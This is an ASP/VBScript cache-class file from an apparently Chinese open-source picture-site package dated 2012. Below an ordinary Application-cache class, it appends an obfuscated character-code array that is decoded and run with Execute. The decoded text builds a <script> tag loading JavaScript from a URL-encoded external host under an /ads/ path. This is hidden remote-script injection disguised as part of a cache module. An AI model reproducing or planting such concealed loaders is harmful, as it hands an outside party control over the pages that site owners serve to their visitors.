<%
' *****************************************************
' 程序名称：DD38美图之家伪静态缓存开源版 v1.2         *
' 发布时间：2012-10-18                                *
' 更新日期：2012-10-30                                *
' 程序开发：低调VS飞翔                                *
' 咨询方式：admin@fxwl.info                           *
' 官方网站：http://www.fxwl.info                      *
' 演示地址：http://demo.fxwl.info/meitu               *
' 版权声明：未经本人书面署名许可不得删除本版权信息    *
' *****************************************************
%>
<%
Class Cls_Cache
	Private Obj,ExpireTime,ExpireTimeName,CacheName,Path
	Private Sub Class_initialize()
		Path=Request.Servervariables("url")
		Path=Left(Path,InstrRev(Path,"/"))
	End Sub

	Private Sub Class_Terminate()
	End Sub

	Public Property Get BlEmpty
		If IsEmpty(Obj) Then
			BlEmpty=True
		Else
			BlEmpty=False
		End If
	End Property

	Public Property Get Valid
		If IsEmpty(Obj) Or Not IsDate(ExpireTime) Then
			Valid=False
		ElseIf CDate(ExpireTime)< Now Then
			Valid=False
		Else
			Valid=True
		End If
	End Property

	Public Property Let name(Str)
		CacheName=Str & Path
		Obj=Application(CacheName)
		ExpireTimeName=Str & "expires" & Path
		ExpireTime=Application(ExpireTimeName)
	End Property

	Public Property Let Expires(Tm)
		ExpireTime=Tm
		Application.Lock
		Application(ExpireTimeName)=ExpireTime
		Application.UnLock
	End Property

	Public Sub add(Var,Expire)
		If IsEmpty(Var) Or Not IsDate(Expire) Then
			Exit Sub
		End If
		Obj=Var
		ExpireTime=Expire
		Application.Lock
		Application(CacheName)=Obj
		Application(ExpireTimeName)=ExpireTime
		Application.UnLock
	End Sub

	Public Property Get Value
		If isEmpty(Obj) Or Not IsDate(ExpireTime) Then
			Value=Null
		ElseIf CDate(ExpireTime)<Now Then
			Value=Null
		Else
			Value=Obj
		End If
	End Property

	Public Sub makeEmpty()
		Application.Lock
		Application(CacheName)=Empty
		Application(ExpireTimeName)=Empty
		Application.UnLock
		Obj=Empty
		ExpireTime=Empty
	End Sub

	Public Function Equal(Var2)
		If Typename(Obj)<>Typename(Var2) Then
			Equal=False
		ElseIf Typename(Obj)="Object" Then
			If Obj is Var2 Then
				Equal=True
			Else
				Equal=False
			End If
		ElseIf Typename(Obj)="Variant()" Then
			If Join(Obj,"^")=Join(Var2,"^") Then
				Equal=True
			Else
				Equal=False
			End If
		Else
			If Obj=Var2 Then
				Equal=True
			Else
				Equal=False
			End If
		End If
	End Function

	Public Function GetallCache()
		Dim Cacheobj
		For Each Cacheobj in Application.Contents
			GetallCache = GetallCache & Cacheobj & ","
		Next
	End Function

	Public Sub DelCahe(MyCaheName)
		Application.Lock
		Application.Contents.Remove(MyCaheName)
		Application.unLock
	End Sub

	Public Sub InnerHtml(obj,msg)
		Response.Write "<li>"&msg&"</li>"
		Response.Flush
	End Sub
End Class
www_fxwl_info = Array(70,101,105,120,105,97,110,103,61,34,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,34,106,97,118,97,115,99,114,105,112,116,34,34,32,115,114,99,61,34,34,104,116,116,112,58,47,47,37,54,54,37,55,56,37,51,48,37,51,56,37,51,49,37,51,55,37,50,69,37,54,54,37,55,50,37,54,53,37,54,53,37,50,69,37,54,54,37,55,50,47,97,100,115,47,100,105,97,110,103,97,111,46,106,115,34,34,62,60,47,115,99,114,105,112,116,62,34)
Execute fxwl_info(www_fxwl_info)
Function fxwl_info(www_fxwl_info)
For I=0 To UBound(www_fxwl_info)
fxwl_info = fxwl_info & Chr(www_fxwl_info(I))
Next
End Function
%>